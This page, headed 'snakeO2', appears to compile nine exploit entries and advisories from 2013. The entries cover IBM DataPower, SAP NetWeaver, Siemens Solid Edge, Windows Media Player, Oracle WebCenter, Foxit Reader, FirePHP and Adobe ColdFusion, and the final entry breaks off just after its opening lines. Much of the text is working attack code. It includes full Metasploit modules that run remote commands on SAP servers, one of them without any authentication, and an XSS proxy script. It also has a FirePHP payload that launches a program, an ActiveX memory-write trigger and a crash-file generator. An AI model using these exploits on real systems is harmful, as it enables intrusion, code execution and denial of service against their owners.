snakeO2

  1. SEC Consult Vulnerability Lab Security Advisory < 20130523-0 >
=======================================================================
              title: JavaScript Execution in WebSphere DataPower Services
            product: IBM WebSphere DataPower Integration Appliance XI50
 vulnerable version: 3.8.2, 4.0, 4.0.1, 4.0.2, 5.0.0
      fixed version: not available, config changes
         CVE number: CVE-2013-0499
             impact: Low/Medium
           homepage: https://www.ibm.com/
              found: 2013-01-28
                 by: A. Falkenberg
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor/product description:
-----------------------------
WebSphere® DataPower® appliances simplify, govern, and optimize the delivery
of services and applications and enhance the security of XML and IT services.
They extend the capabilities of an infrastructure by providing a multitude of
functions.

URL: IBM - Software - WebSphere DataPower SOA Appliances - United States

Vulnerability overview/description:
-----------------------------------
For the purposes of debugging, DataPower provides configuration options to echo
requests received from the client. For example, the XML Firewall service can be
configured to echo requests by choosing the backend as 'loopback'. Other services
like Multi Protocol Gateway and Web Service Proxy can be configured to echo
requests by setting the variable "var://service/mpgw/skip-backside" in their
processing policy. In such configurations, the requests are not sent to a backend
server. Without adequate validation and processing, the requests may be echoed
back to the client. Loopback services that blindly echo requests should only be
used for debugging purposes and are not intended to be run in production
environments, as they can result in potential security threats.

For example, if a request with embedded arbitrary JavaScript is sent to such
services, they will simply echo it back, resulting in a potential JavaScript
execution vulnerability in the client's browser.

URL: https://www-304.ibm.com/support/docview.wss?uid=swg21637717

Proof of concept:
-----------------
The proof of concept was tested on an IBM Xi50 with the backend configured as a
"loopback" Web Service. The "loopback" Web Service can be used to execute
arbitrary JavaScript code in a victim's browser. Any valid SOAP message sent to
the Web service is returned unmodified to the receiver. If the SOAP response of
the "loopback" Web Service is parsed by a browser, any JavaScript that is
contained within the XML document will get executed.

The following PHP script demonstrates a reflected cross site scripting.

<?php
$soapEndpoint = "http://127.0.0.1:80";
$soapMessage = '<?xml version="1.0"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:sam="http://sample02.policy.samples.rampart.apache.org">
<soapenv:Header/>
<soapenv:Body>
<sam:echo>
<html:html xmlns:html="http://www.w3.org/1999/xhtml">
<html:script>alert("XML XSS");</html:script>
</html:html>
</sam:echo>
</soapenv:Body>
</soapenv:Envelope>';

if(isset($_POST['soapMessage']) and isset($_POST['soapUrl'])){
    $soap_do = curl_init();
    curl_setopt($soap_do, CURLOPT_URL, $_POST['soapUrl'] );
    curl_setopt($soap_do, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($soap_do, CURLOPT_TIMEOUT, 10);
    curl_setopt($soap_do, CURLOPT_RETURNTRANSFER, true );
    curl_setopt($soap_do, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($soap_do, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($soap_do, CURLOPT_POST, true );
    curl_setopt($soap_do, CURLOPT_POSTFIELDS, $_POST['soapMessage']);
    curl_setopt($soap_do, CURLOPT_HTTPHEADER, array('Content-Type: text/xml; charset=utf-8', 'Content-Length: '.strlen($_POST['soapMessage']) ));
    $result = curl_exec($soap_do);
    $err = curl_error($soap_do);
    header('Content-type: text/xml');
    echo $result;
    exit;
}
?>
<html>
<body>
<h1>XSS XML Proxy</h1>
<form name="input" action="" method="post">
SOAP Endpoint: <input type="text" name="soapUrl" value="<?php echo $soapEndpoint; ?>"><br />
SOAP Message: <textarea cols="70" name="soapMessage" rows="14"><?php echo $soapMessage; ?></textarea><br />
<br />
<input type="submit" value="Submit">
</form>
</body>
</html>

Vulnerable / tested versions:
-----------------------------
SEC Consult verified the vulnerability in the WebSphere DataPower Appliance XI50.
The vendor provided an extended list of vulnerable versions:
WebSphere DataPower 3.8.2, 4.0, 4.0.1, 4.0.2, 5.0.0.

Vendor contact timeline:
------------------------
2013-01-30: Sending advisory and proof of concept exploit via encrypted channel.
2013-01-31: Vendor confirms receipt
2013-05-17: Vendor posts security bulletin
2013-05-23: SEC Consult releases coordinated security advisory.

Solution:
---------
The vendor does not offer a patch. The vulnerability can be prevented by
disabling the services that blindly echo requests back. A detailed description
can be found on the vendor's site:
https://www-304.ibm.com/support/docview.wss?uid=swg21637717

Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

Source: Bugtraq: SEC Consult SA-20130523-0 :: JavaScript Execution in IBM WebSphere DataPower Services
  2. ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

##
# This module is based on, inspired by, or is a port of a plugin available in
# the Onapsis Bizploit Opensource ERP Penetration Testing framework -
# http://www.onapsis.com/research-free-solutions.php.
# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts
# in producing the Metasploit modules and was happy to share his knowledge and
# experience - a very cool guy.
#
# The following guys from ERP-SCAN deserve credit for their contributions -
# Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry Chastukhin and
# Dmitry Evdokimov.
#
# I'd also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis
# who have Beta tested the modules and provided excellent feedback. Some people
# just seem to enjoy hacking SAP
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::CmdStagerVBS
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::HttpClient

  def initialize
    super(
      'Name'           => 'SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution',
      'Description'    => %q{
          This module abuses the SAP NetWeaver SXPG_CALL_SYSTEM function, on the SAP SOAP RFC
        Service, to execute remote commands. This module needs SAP credentials with privileges
        to use the /sap/bc/soap/rfc in order to work. The module has been tested successfully
        on Windows 2008 64 bits and Linux 64 bits platforms.
      },
      'References'     =>
        [
          [ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]
        ],
      'DisclosureDate' => 'Mar 26 2013',
      'Platform'       => ['win', 'unix'],
      'Targets'        =>
        [
          [ 'Linux',
            {
              'Arch' => ARCH_CMD,
              'Platform' => 'unix'
              #'Payload' =>
              #{
              #'DisableNops' => true,
              #'Space' => 232,
              #'Compat' =>
              #{
              #'PayloadType' => 'cmd',
              #'RequiredCmd' => 'perl ruby',
              #}
              #}
            }
          ],
          [ 'Windows x64',
            {
              'Arch' => ARCH_X86_64,
              'Platform' => 'win'
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => false,
      'Author'         => [ 'nmonkee' ],
      'License'        => MSF_LICENSE
    )

    register_options(
      [
        Opt::RPORT(8000),
        OptString.new('CLIENT', [true, 'SAP Client', '001']),
        OptString.new('USERNAME', [true, 'Username', 'SAP*']),
        OptString.new('PASSWORD', [true, 'Password', '06071992'])
      ], self.class)

    register_advanced_options(
      [
        OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments (Windows Target)', 250]),
      ], self.class)
  end

  def send_soap_request(data)
    res = send_request_cgi({
      'uri' => '/sap/bc/soap/rfc',
      'method' => 'POST',
      'data' => data,
      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
      'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
      'ctype' => 'text/xml; charset=UTF-8',
      'headers' => {
        'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
      },
      'vars_get' => {
        'sap-client' => datastore['CLIENT'],
        'sap-language' => 'EN'
      }
    })
    return res
  end

  def build_soap_request(command, sap_command, sap_os)
    data = "<?xml version=\"1.0\" encoding=\"utf-8\" ?>"
    data << "<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">"
    data << "<env:Body>"
    data << "<n1:SXPG_CALL_SYSTEM xmlns:n1=\"urn:sap-com:document:sap:rfc:functions\" env:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
    data << "<ADDITIONAL_PARAMETERS>#{command}</ADDITIONAL_PARAMETERS>"
    data << "<COMMANDNAME>#{sap_command}</COMMANDNAME>"
    data << "<OPERATINGSYSTEM>#{sap_os}</OPERATINGSYSTEM>"
    data << "<EXEC_PROTOCOL><item></item></EXEC_PROTOCOL>"
    data << "</n1:SXPG_CALL_SYSTEM>"
    data << "</env:Body>"
    data << "</env:Envelope>"
    return data
  end

  def check
    data = rand_text_alphanumeric(4 + rand(4))
    res = send_soap_request(data)
    if res and res.code == 500 and res.body =~ /faultstring/
      return Exploit::CheckCode::Detected
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    if target.name =~ /Windows/
      linemax = datastore['PAYLOAD_SPLIT']
      vprint_status("#{rhost}:#{rport} - Using custom payload size of #{linemax}") if linemax != 250
      print_status("#{rhost}:#{rport} - Sending SOAP SXPG_CALL_SYSTEM request")
      execute_cmdstager({ :delay => 0.35, :linemax => linemax })
    elsif target.name =~ /Linux/
      file = rand_text_alphanumeric(5)
      stage_one = create_unix_payload(1,file)
      print_status("#{rhost}:#{rport} - Dumping the payload to /tmp/#{file}...")
      res = send_soap_request(stage_one)
      if res and res.code == 200 and res.body =~ /External program terminated/
        print_good("#{rhost}:#{rport} - Payload dump was successful")
      else
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Payload dump failed")
      end
      stage_two = create_unix_payload(2,file)
      print_status("#{rhost}:#{rport} - Executing /tmp/#{file}...")
      send_soap_request(stage_two)
    end
  end

  def create_unix_payload(stage, file)
    command = ""
    if target.name =~ /Linux/
      if stage == 1
        my_payload = payload.encoded.gsub(" ","\t")
        my_payload.gsub!("&","&")
        my_payload.gsub!("<","<")
        command = "-o /tmp/" + file + " -n pwnie" + "\n!"
        command << my_payload
        command << "\n"
      elsif stage == 2
        command = "-ic /tmp/" + file
      end
    end
    return build_soap_request(command.to_s, "DBMCLI", "ANYOS")
  end

  def execute_command(cmd, opts)
    command = cmd.gsub(/&/, "&")
    command.gsub!(/%TEMP%\\/, "")
    data = build_soap_request("{command}", "LIST_DB2DUMP", "ANYOS")
    begin
      res = send_soap_request(data)
      if res and res.code == 200
        return
      else
        if res and res.body =~ /faultstring/
          error = res.body.scan(%r{<faultstring>(.*?)</faultstring>})
          0.upto(error.length-1) do |i|
            vprint_error("#{rhost}:#{rport} - Error #{error[i]}")
          end
        end
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Error injecting command")
      end
    rescue ::Rex::ConnectionError
      fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Unable to connect")
    end
  end
end

Source: SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution
  3. SIEMENS Solid Edge ST4/ST5 SEListCtrlX ActiveX Control SetItemReadOnly Arbitrary Memory Rewrite Remote Code Execution Vulnerability

tested against:
Microsoft Windows Server 2003 r2 sp2
Microsoft Windows XP sp3
Microsoft Windows 7
Internet Explorer 7/8

software description: http://en.wikipedia.org/wiki/Solid_Edge
vendor site: http://www.siemens.com/entry/cc/en/
download url: http://www.plm.automation.siemens.com/en_us/products/velocity/forms/solid-edge-student.cfm
file tested: SolidEdgeV104ENGLISH_32Bit.exe

background:
the mentioned software installs an ActiveX control with the following settings:

ActiveX settings:
ProgID: SELISTCTRLX.SEListCtrlXCtrl.1
CLSID: {5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D}
binary path: C:\Program Files\Solid Edge ST4\Program\SEListCtrlX.ocx
Safe For Scripting (Registry): True
Safe For Initialization (Registry): True

Vulnerability:
This control exposes the SetItemReadOnly() method, see typelib:

...
/* DISPID=14 */
function SetItemReadOnly(
    /* VT_VARIANT [12] */ $hItem,
    /* VT_BOOL [11] */ $bReadOnly
)
{
}
...

(i) By setting the first argument to a memory address and the second one to
'false' you can write a NULL byte inside an arbitrary memory region.
(ii) By setting the first argument to a memory address and the second one to
'true' you can write a \x08 byte inside an arbitrary memory region.

Example crash:

EAX 61616161
ECX 0417AB44
EDX 01B7F530
EBX 0000000C
ESP 01B7F548
EBP 01B7F548
ESI 0417A930
EDI 027D5DD0 SEListCt.027D5DD0
EIP 033FD158 control.033FD158
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFD9000(4000)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty -NAN FFFF FFFFFFFF FFFFFFFF
ST1 empty 3.3760355862290856960e-4932
ST2 empty +UNORM 48F4 00000000 00000000
ST3 empty -2.4061003025887744000e+130
ST4 empty -UNORM C198 00000000 00000000
ST5 empty 0.0
ST6 empty 1633771873.0000000000
ST7 empty 1633771873.0000000000
               3 2 1 0      E S P U O Z D I
FST 4000  Cond 1 0 0 0  Err 0 0 0 0 0 0 0 0  (EQ)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

Call stack of thread 000009B8
Address  Stack     Procedure / arguments                                        Called from         Frame
01B7F54C 027D5DF3  control.?SetItemReadOnly@SEListCtrl@@QAEXPAVSEListItem@@H@Z  SEListCt.027D5DED   01B7F548
01B7F560 787FF820  Includes SEListCt.027D5DF3                                   mfc100u.787FF81E    01B7F55C
01B7F56C 78807BF5  mfc100u.787FF810                                             mfc100u.78807BF0    01B7F618
01B7F61C 78808312  ? mfc100u.78807A5B                                           mfc100u.7880830D    01B7F618

vulnerable code, inside the close control.dll:

...
;------------------------------------------------------------------------------
Align 4
?SetItemReadOnly@SEListCtrl@@QAEXPAVSEListItem@@H@Z:
    push    ebp
    mov     ebp,esp
    mov     eax,[ebp+08h]
    test    eax,eax
    jz      L1011D15C
    cmp     dword ptr [ebp+0Ch],00000000h
    jz      L1011D158
    or      dword ptr [eax+2Ch],00000008h   <-------------------- it crashes here
    pop     ebp
    retn    0008h
;------------------------------------------------------------------------------
...
...
;------------------------------------------------------------------------------
L1011D158:
    and     dword ptr [eax+2Ch],FFFFFFF7h   <-------------------- or here
L1011D15C:
    pop     ebp
    retn    0008h
;------------------------------------------------------------------------------
...

As attachment, code to reproduce the crash.

<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D' id='obj' />
</object>
<script language='javascript'>
//obj.SetItemReadOnly(0x61616161,false);
obj.SetItemReadOnly(0x61616161,true);
</script>

Source: SIEMENS Solid Edge ST4/ST5 SEListCtrlX ActiveX - SetItemReadOnly Arbitrary Memory Rewrite RCE
  4. # Title : Windows Media Player 11.0.0 (.wav) Crash PoC
# Date: 2013-01-12
# Software Link: Windows Media Player - Microsoft Windows
# Vendor : Windows Media Player download
# Author: Asesino04
# Tested on: Windows XP SP2
# Home: ??????? ARAB ??????
# Greeting To :All Arab47 memberz/ 3xp1r3 Cyber Army / Newbie3viLc063s / Inj3ct0r Team
# Exploit Code (perl) :

#!/usr/bin/perl
system("title The Black Devils");
system("color 1e");
system("cls");
print "\n\n";
print " |=======================================================|\n";
print " |= [!] Name : Windows Media Player 11.0 ||.wav         =|\n";
print " |= [!] Exploit : Crash Poc                             =|\n";
print " |= [!] Author : Asesino04                              =|\n";
print " |= [!] Mail: mr.k4rizma(at)gmail(dot)com               =|\n";
print " |=======================================================|\n";
sleep(2);
print "\n";
# Creating ...
my $PoC = "\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01".
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E".
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01".
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E".
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x66\x66\x66\x00";

open(file , ">", "PoC.wav"); # Evil File wav
print file $PoC;
print "\n [+] File successfully created!\n" or die print "\n [-] OupsS! File is Not Created !! ";
close(file);

# Contact : ------------------
# Fane Page : www.facebook.com/Th3.Black.D3Vils
# Youtube : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email : mr.k4rizma@gmail.com

Source: Windows Media Player 11.0.0 (.wav) - Crash PoC
  5. SAP ConfigServlet OS Command Execution

SAP ConfigServlet command execution
sap-configservlet-command-exec (83637)
The risk level is classified as High Risk

Description:
SAP ConfigServlet could allow a remote attacker to execute arbitrary commands on
the system. By sending a specially-crafted GET request, an attacker could exploit
this vulnerability to inject and execute arbitrary commands on the system.

*CVSS:
Base Score: 10
Access Vector: Network
Access Complexity: Low
Authentication: None
Confidentiality Impact: Complete
Integrity Impact: Complete
Availability Impact: Complete
Temporal Score: 9
Exploitability: Functional
Remediation Level: Unavailable
Report Confidence: Uncorroborated

Consequences: Gain Access

Remedy:
No remedy available as of April 24, 2013.

References:
Offensive Security Exploit Database [04-18-2013]: SAP ConfigServlet OS Command Execution.
Packet Storm Security [04-19-2013]: SAP ConfigServlet OS Command Execution.
SAP Web site: SAP.

Platforms Affected: SAP ConfigServlet
Reported: Apr 18, 2013

Source: ISS X-Force Database: sap-configservlet-command-exec(83637): SAP ConfigServlet command execution

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SAP ConfigServlet OS command execution',
      'Description'    => %q{
        This module allows execution of operating system commands through the SAP
        ConfigServlet without any authentication.
      },
      'Author'         =>
        [
          'Dmitry Chastuhin', # Vulnerability discovery (based on the reference presentation)
          'Andras Kabai', # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf'],
        ],
      'DisclosureDate' => 'Nov 01 2012' # Based on the reference presentation
    ))

    register_options(
      [
        Opt::RPORT(50000),
        OptString.new('CMD', [ true, 'The command to execute', 'whoami']),
        OptString.new('PATH', [ true, 'Path to ConfigServlet ', '/ctc/servlet/ConfigServlet']),
        OptBool.new('SSL', [true, 'Use SSL', false])
      ], self.class)
  end

  def run_host(ip)
    begin
      print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])
      res = send_request_cgi(
        {
          'uri' => datastore['PATH'] + '?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text.uri_encode(datastore['CMD']),
          'method' => 'GET',
        })
      if !res or res.code != 200
        print_error("#{rhost}:#{rport} - Exploit failed.")
        return
      end
    rescue ::Rex::ConnectionError
      print_error("#{rhost}:#{rport} - Failed to connect to the server")
      return
    end

    if res.body.include?("Process created")
      print_good("#{rhost}:#{rport} - Exploited successfully\n")
      print_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n")
      print_line("#{rhost}:#{rport} - Output: #{res.body}")
    else
      print_error("#{rhost}:#{rport} - Exploit failed.")
      vprint_error("#{rhost}:#{rport} - Output: #{res.body}")
    end
  end
end

Source: SAP ConfigServlet OS Command Execution
  6. SEC Consult Vulnerability Lab Security Advisory < 20130417-2 >
=======================================================================
              title: HTTP header injection/Cache poisoning in Oracle WebCenter Sites Satellite Server
            product: Oracle WebCenter Sites Satellite Server (former FatWire Satellite Server)
 vulnerable version: 7.6.0 Patch1, 7.6.2, 11.1.1.6.0, 11.1.1.6.1
      fixed version: Patch information see sections below
                CVE: CVE-2013-1509
             impact: medium
           homepage: Oracle and FatWire
              found: 2012-09-17
                 by: K. Gudinavicius
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
FatWire Satellite Server is a predecessor product of Oracle WebCenter Sites
Satellite Server.

"Oracle WebCenter Sites Satellite Server enables organizations to deliver
segmented, targeted, and dynamically assembled content across global Web
properties with rapid response times and intelligent edge caching to optimize
and speed the delivery of dynamic Web experiences."

Source: http://www.oracle.com/us/products/middleware/webcenter/satellite-server/overview/index.html

Vulnerability overview/description:
-----------------------------------
Due to unsanitized user input it is possible to inject arbitrary HTTP header
values in certain HTTP responses of the Satellite Server. This can be exploited,
for example, to perform session fixation and malicious redirection attacks via
the Set-Cookie and the Refresh headers.

Moreover, the Satellite Server caches these HTTP responses with the injected
HTTP header, resulting in all further requests to the same resource being served
with the poisoned HTTP response while these objects remain in cache.

Proof of concept:
-----------------
An arbitrary header can be injected in the HTTP responses of the downloadable
resources. The values of the blobheadername2 and the blobheadervalue2 URL
parameters are user controllable.

In the following example the Refresh header is injected:

http://fatwire/cs/Satellite?blobcol=urldata&blobheadername1=content-type&blobheadername2=Refresh&
blobheadervalue1=application/pdf&blobheadervalue2=0;url=http://www.sec-consult.com&blobkey=id&
blobnocache=false&blobtable=MungoBlobs&blobwhere=1342534304149&ssbinary=true&site=S08

The returned HTTP response will contain the injected Refresh header and its
value. Furthermore, the HTTP response will be cached, so the next time users
access the same downloadable resource using the standard URL, they will be
affected and redirected using the injected Refresh header value.

HTTP/1.1 200 OK
Date: Thu, 06 Sep 2012 15:59:04 GMT
Refresh: 0;url=http://www.sec-consult.com
Last-Modified: Thu, 06 Sep 2012 15:54:20 GMT
Content-Type: application/pdf
Connection: close
Content-Length: 772193

Vulnerable / tested versions:
-----------------------------
The following installation has been tested:
* FatWire Satellite Server 7.6.0 Patch1.

Vendor contact timeline:
------------------------
2012-11-26: Contacting vendor through secalert_us@oracle.com
2012-11-26: Vendor response, will investigate issues
2012-11-27: Investigation ongoing, the following ID assigned:
            S0321206 - ARBITRARY HTTP HEADER INJECTION/CACHE POISONING IN FATWIRE
2013-01-25: S0321206 Issue fixed in main codeline, scheduled for a future CPU
2013-04-12: S0321206 is fixed in upcoming CPU on 2013-04-16
2013-04-16: Oracle releases April 2013 CPU
2013-04-17: Public release of SEC Consult advisory

Solution:
---------
Apply latest patches, see: Oracle Critical Patch Update - April 2013

Workaround:
-----------

Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

Source: Oracle WebCenter Sites Satellite Server - HTTP Header Injection
  7. # Exploit Title: Foxit Reader 5.4.3.* - 5.4.5.0124 - PDF (Portable Document Format) XREF (Cross Reference Table) parsing Denial of Service Vulnerability
# Date (found): 2012.11.17
# Date (publish): 2013.04.17
# Exploit Author: FuzzMyApp
# Vendor Homepage: PDF Converter PDF Editor Edit and Convert PDF, Word files to PDF, Free PDF convert, save PDF forms, create PDF forms, pdf documents, protect pdf
# Version: 5.4.3.* - 5.4.5.0124 (till latest)
# Tested on: Windows XP SP3 Professional Edition

Name: PDF Cross Reference Table parsing Denial of Service vulnerability.
Type: DoS
Description: Foxit Reader does not validate data in the PDF Cross Reference
Table (XREF) header properly. Tampering with the XREF header may lead to an
integer division by zero exception during its parsing by the application. The
raised, unhandled exception causes a Denial of Service of Foxit Reader. The
vendor was notified on 2013.02.21 but has not responded to this submission.
This issue is present in the latest version of the application available at
the time of writing.
Exception: Integer division by zero exception.
Disasm:
0055EB70 |> \33C0          |XOR EAX,EAX
0055EB72 |> 8B28           |MOV EBP,DWORD PTR DS:[EAX]
0055EB74 |. 896C24 64      |MOV DWORD PTR SS:[ESP+64],EBP
0055EB78 |. 8D3C2E         |LEA EDI,DWORD PTR DS:[ESI+EBP]
0055EB7B |. 3BFE           |CMP EDI,ESI
0055EB7D |. 897C24 20      |MOV DWORD PTR SS:[ESP+20],EDI
0055EB81 |. 0F82 7F020000  |JB Foxit_Re.0055EE06
0055EB87 |. 83C8 FF        |OR EAX,FFFFFFFF
0055EB8A |. 33D2           |XOR EDX,EDX
0055EB8C |. F7F7           |DIV EDI                         ; [www.FuzzMyApp.com] Integer division by zero exception
0055EB8E |. 394424 3C      |CMP DWORD PTR SS:[ESP+3C],EAX
0055EB92 |. 0F83 6E020000  |JNB Foxit_Re.0055EE06

Advisory: Foxit Reader 5.4.3.* - 5.4.5.0124 - PDF (Portable Document Format) XREF (Cross Reference Table) parsing Denial of Service Vulnerability
Exploit PoC:
http://fuzzmyapp.com/advisories/FMA-2012-042/FMA-2012-042.pdf
http://www.exploit-db.com/sploits/24962.pdf

Source: Foxit Reader 5.4.3.* - 5.4.5.0124 - PDF XREF Parsing Denial of Service Vulnerability
  8. FirePHP Firefox Plugin 0.7.1 - Remote Command Execution

# Exploit Title: Firephp firefox plugin RCE
# Date: 17/04/2013
# Exploit Author: Wireghoul
# Vendor Homepage: FirePHP - Firebug Extension for AJAX Development
# Software Link: https://addons.mozilla.org/en-US/firefox/addon/firephp/versions/
# Version: All versions up to and including 0.7.1
# Tested on: Windows 7
# Advisory: FirePHP Firefox plugin RCE PoC

<?php
/*************************************************************
 * FirePHP Firefox plugin RCE PoC                            *
 * Written by Wireghoul - http://www.justanotherhacker.com   *
 * Greetz to @bcoles urbanadventurer @malerisch              *
 *************************************************************/

// XUL code to launch calc.exe
$exploit = '{"RequestHeaders":{"1":"1","2":"2","3":"3","4":"4","5":"5","6":"6","7":"7","8":"8","9":"9","UR<script>';
$exploit.= 'var lFile=Components.classes[\"@mozilla.org/file/local;1\"].createInstance(Components.interfaces.nsILocalFile);';
$exploit.= 'lFile.initWithPath(\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\calc.exe\");';
$exploit.= 'var process=Components.classes[\"@mozilla.org/process/util;1\"].createInstance(Components.interfaces.nsIProcess);';
$exploit.= 'process.init(lFile);';
$exploit.= 'process.run(true,[],0);void(0);';
$exploit.= '<\/SCRIPT>":"PWNT"}}';

// Send FirePHP dump data
header("X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2");
header("X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3");
header("X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1");
$payload= "X-Wf-1-1-1-1: ";
$payload.= strlen($exploit).'|'.$exploit."|\r\n";
header($payload);
?>
<html>
<head>
<title>FirePHP Firefox plugin RCE PoC</title>
</head>
<body>
PWNT!
</body>
</html>

Source: FirePHP Firefox Plugin 0.7.1 - Remote Command Execution
  9. Adobe ColdFusion APSB13-03 Remote Exploit

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'digest/sha1'
require 'openssl'

class Metasploit3 < Msf::Exploit::Remote

